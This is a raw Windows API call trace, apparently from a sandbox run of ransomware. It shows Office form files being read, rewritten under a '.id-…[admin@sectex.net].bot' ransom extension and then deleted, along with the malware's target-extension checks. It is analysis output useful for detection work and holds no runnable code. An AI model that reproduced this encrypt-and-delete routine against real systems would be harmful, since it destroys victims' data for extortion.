	[0164.301] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.301] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0164.302] SetEndOfFile (hFile=0x398) returned 1
	[0164.302] CloseHandle (hObject=0x398) returned 1
	[0164.302] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.302] SetEndOfFile (hFile=0x3d0) returned 1
	[0164.304] CloseHandle (hObject=0x3d0) returned 1
	[0164.304] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.304] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\securs.ico")) returned 1
	[0164.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURS.ICO") returned 64
	[0164.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURS.ICO") returned 64
	[0164.305] lstrlenW (lpString=".doc") returned 4
	[0164.305] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0164.305] lstrlenW (lpString=".docx") returned 5
	[0164.305] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0164.305] lstrlenW (lpString=".pdf") returned 4
	[0164.305] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0164.305] lstrlenW (lpString=".xls") returned 4
	[0164.305] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0164.305] lstrlenW (lpString=".xlsx") returned 5
	[0164.305] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0164.305] lstrlenW (lpString=".ppt") returned 4
	[0164.305] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0164.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURS.ICO") returned 64
	[0164.305] lstrlenW (lpString=".zip") returned 4
	[0164.305] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0164.305] lstrlenW (lpString=".rar") returned 4
	[0164.305] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0164.305] lstrlenW (lpString=".bz2") returned 4
	[0164.305] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0164.305] lstrlenW (lpString=".7z") returned 3
	[0164.305] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0164.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURS.ICO") returned 64
	[0164.305] lstrlenW (lpString=".dbf") returned 4
	[0164.305] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0164.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURS.ICO") returned 64
	[0164.305] lstrlenW (lpString=".1cd") returned 4
	[0164.305] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0164.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURS.ICO") returned 64
	[0164.306] lstrlenW (lpString=".jpg") returned 4
	[0164.306] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0164.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURS.ICO") returned 64
	[0164.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURS.ICO") returned 64
	[0164.306] lstrlenW (lpString=".doc") returned 4
	[0164.306] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0164.306] lstrlenW (lpString=".docx") returned 5
	[0164.306] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0164.306] lstrlenW (lpString=".pdf") returned 4
	[0164.306] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0164.306] lstrlenW (lpString=".xls") returned 4
	[0164.306] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0164.306] lstrlenW (lpString=".xlsx") returned 5
	[0164.306] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0164.306] lstrlenW (lpString=".ppt") returned 4
	[0164.306] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0164.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURS.ICO") returned 64
	[0164.306] lstrlenW (lpString=".zip") returned 4
	[0164.306] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0164.306] lstrlenW (lpString=".rar") returned 4
	[0164.306] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0164.306] lstrlenW (lpString=".bz2") returned 4
	[0164.306] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0164.306] lstrlenW (lpString=".7z") returned 3
	[0164.306] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0164.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURS.ICO") returned 64
	[0164.307] lstrlenW (lpString=".dbf") returned 4
	[0164.307] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0164.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURS.ICO") returned 64
	[0164.307] lstrlenW (lpString=".1cd") returned 4
	[0164.307] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0164.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURS.ICO") returned 64
	[0164.307] lstrlenW (lpString=".jpg") returned 4
	[0164.307] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0164.307] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0164.307] lstrlenW (lpString="SHARING.CFG") returned 11
	[0164.307] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SHARING.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\sharing.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.307] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=771) returned 1
	[0164.307] CloseHandle (hObject=0x3d0) returned 1
	[0164.308] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SHARING.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\sharing.cfg")) returned 0x20
	[0164.308] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SHARING.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\sharing.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.308] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SHARING.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\sharing.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.308] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.308] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.308] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SHARING.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\sharing.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0164.309] GetLastError () returned 0x0
	[0164.309] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x303, lpOverlapped=0x0) returned 1
	[0164.310] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x310, lpOverlapped=0x0) returned 1
	[0164.311] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.311] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0164.311] SetEndOfFile (hFile=0x398) returned 1
	[0164.311] CloseHandle (hObject=0x398) returned 1
	[0164.311] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.311] SetEndOfFile (hFile=0x3d0) returned 1
	[0164.314] CloseHandle (hObject=0x3d0) returned 1
	[0164.314] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SHARING.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.314] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SHARING.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\sharing.cfg")) returned 1
	[0164.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SHARING.CFG") returned 65
	[0164.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SHARING.CFG") returned 65
	[0164.315] lstrlenW (lpString=".doc") returned 4
	[0164.315] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0164.315] lstrlenW (lpString=".docx") returned 5
	[0164.315] lstrcmpiW (lpString1=".docx", lpString2="G.CFG") returned -1
	[0164.315] lstrlenW (lpString=".pdf") returned 4
	[0164.315] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0164.315] lstrlenW (lpString=".xls") returned 4
	[0164.315] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0164.315] lstrlenW (lpString=".xlsx") returned 5
	[0164.315] lstrcmpiW (lpString1=".xlsx", lpString2="G.CFG") returned -1
	[0164.315] lstrlenW (lpString=".ppt") returned 4
	[0164.315] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0164.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SHARING.CFG") returned 65
	[0164.315] lstrlenW (lpString=".zip") returned 4
	[0164.315] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0164.315] lstrlenW (lpString=".rar") returned 4
	[0164.315] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0164.315] lstrlenW (lpString=".bz2") returned 4
	[0164.315] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0164.315] lstrlenW (lpString=".7z") returned 3
	[0164.315] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0164.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SHARING.CFG") returned 65
	[0164.315] lstrlenW (lpString=".dbf") returned 4
	[0164.315] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0164.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SHARING.CFG") returned 65
	[0164.315] lstrlenW (lpString=".1cd") returned 4
	[0164.315] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0164.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SHARING.CFG") returned 65
	[0164.315] lstrlenW (lpString=".jpg") returned 4
	[0164.315] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0164.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SHARING.CFG") returned 65
	[0164.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SHARING.CFG") returned 65
	[0164.316] lstrlenW (lpString=".doc") returned 4
	[0164.316] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0164.316] lstrlenW (lpString=".docx") returned 5
	[0164.316] lstrcmpiW (lpString1=".docx", lpString2="G.CFG") returned -1
	[0164.316] lstrlenW (lpString=".pdf") returned 4
	[0164.316] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0164.316] lstrlenW (lpString=".xls") returned 4
	[0164.316] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0164.316] lstrlenW (lpString=".xlsx") returned 5
	[0164.316] lstrcmpiW (lpString1=".xlsx", lpString2="G.CFG") returned -1
	[0164.316] lstrlenW (lpString=".ppt") returned 4
	[0164.316] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0164.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SHARING.CFG") returned 65
	[0164.316] lstrlenW (lpString=".zip") returned 4
	[0164.316] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0164.316] lstrlenW (lpString=".rar") returned 4
	[0164.316] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0164.316] lstrlenW (lpString=".bz2") returned 4
	[0164.316] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0164.316] lstrlenW (lpString=".7z") returned 3
	[0164.316] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0164.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SHARING.CFG") returned 65
	[0164.316] lstrlenW (lpString=".dbf") returned 4
	[0164.316] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0164.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SHARING.CFG") returned 65
	[0164.316] lstrlenW (lpString=".1cd") returned 4
	[0164.316] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0164.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SHARING.CFG") returned 65
	[0164.316] lstrlenW (lpString=".jpg") returned 4
	[0164.316] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0164.316] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0164.317] lstrlenW (lpString="SIGN.CFG") returned 8
	[0164.317] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGN.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\sign.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0164.591] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=664) returned 1
	[0164.591] CloseHandle (hObject=0x3e8) returned 1
	[0164.591] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGN.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\sign.cfg")) returned 0x20
	[0164.591] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGN.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\sign.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0165.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGN.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\sign.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0165.569] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0165.569] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0165.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGN.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\sign.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0168.557] GetLastError () returned 0x0
	[0168.557] ReadFile (in: hFile=0x3e8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x298, lpOverlapped=0x0) returned 1
	[0168.558] WriteFile (in: hFile=0x3d0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x2a0, lpOverlapped=0x0) returned 1
	[0168.559] ReadFile (in: hFile=0x3e8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0168.559] WriteFile (in: hFile=0x3d0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0168.559] SetEndOfFile (hFile=0x3d0) returned 1
	[0168.559] CloseHandle (hObject=0x3d0) returned 1
	[0168.559] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.559] SetEndOfFile (hFile=0x3e8) returned 1
	[0168.561] CloseHandle (hObject=0x3e8) returned 1
	[0168.561] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGN.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0168.562] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGN.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\sign.cfg")) returned 1
	[0168.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGN.CFG") returned 62
	[0168.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGN.CFG") returned 62
	[0168.563] lstrlenW (lpString=".doc") returned 4
	[0168.563] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0168.563] lstrlenW (lpString=".docx") returned 5
	[0168.563] lstrcmpiW (lpString1=".docx", lpString2="N.CFG") returned -1
	[0168.563] lstrlenW (lpString=".pdf") returned 4
	[0168.563] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0168.563] lstrlenW (lpString=".xls") returned 4
	[0168.563] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0168.563] lstrlenW (lpString=".xlsx") returned 5
	[0168.563] lstrcmpiW (lpString1=".xlsx", lpString2="N.CFG") returned -1
	[0168.563] lstrlenW (lpString=".ppt") returned 4
	[0168.563] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0168.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGN.CFG") returned 62
	[0168.563] lstrlenW (lpString=".zip") returned 4
	[0168.563] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0168.563] lstrlenW (lpString=".rar") returned 4
	[0168.563] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0168.563] lstrlenW (lpString=".bz2") returned 4
	[0168.563] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0168.563] lstrlenW (lpString=".7z") returned 3
	[0168.563] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0168.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGN.CFG") returned 62
	[0168.563] lstrlenW (lpString=".dbf") returned 4
	[0168.563] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0168.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGN.CFG") returned 62
	[0168.563] lstrlenW (lpString=".1cd") returned 4
	[0168.563] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0168.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGN.CFG") returned 62
	[0168.564] lstrlenW (lpString=".jpg") returned 4
	[0168.564] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0168.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGN.CFG") returned 62
	[0168.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGN.CFG") returned 62
	[0168.564] lstrlenW (lpString=".doc") returned 4
	[0168.564] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0168.564] lstrlenW (lpString=".docx") returned 5
	[0168.564] lstrcmpiW (lpString1=".docx", lpString2="N.CFG") returned -1
	[0168.564] lstrlenW (lpString=".pdf") returned 4
	[0168.564] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0168.564] lstrlenW (lpString=".xls") returned 4
	[0168.564] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0168.564] lstrlenW (lpString=".xlsx") returned 5
	[0168.564] lstrcmpiW (lpString1=".xlsx", lpString2="N.CFG") returned -1
	[0168.564] lstrlenW (lpString=".ppt") returned 4
	[0168.564] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0168.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGN.CFG") returned 62
	[0168.564] lstrlenW (lpString=".zip") returned 4
	[0168.564] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0168.564] lstrlenW (lpString=".rar") returned 4
	[0168.564] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0168.564] lstrlenW (lpString=".bz2") returned 4
	[0168.564] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0168.564] lstrlenW (lpString=".7z") returned 3
	[0168.564] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0168.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGN.CFG") returned 62
	[0168.564] lstrlenW (lpString=".dbf") returned 4
	[0168.564] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0168.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGN.CFG") returned 62
	[0168.564] lstrlenW (lpString=".1cd") returned 4
	[0168.564] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0168.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGN.CFG") returned 62
	[0168.564] lstrlenW (lpString=".jpg") returned 4
	[0168.564] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0168.565] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0168.565] lstrlenW (lpString="TASKACCS.ICO") returned 12
	[0168.565] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskaccs.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0168.565] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=2998) returned 1
	[0168.565] CloseHandle (hObject=0x3e8) returned 1
	[0168.565] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskaccs.ico")) returned 0x20
	[0168.566] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskaccs.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.566] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskaccs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0168.566] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.566] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.566] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskaccs.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0168.567] GetLastError () returned 0x0
	[0168.567] ReadFile (in: hFile=0x3e8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0168.583] WriteFile (in: hFile=0x3d0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0168.584] ReadFile (in: hFile=0x3e8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
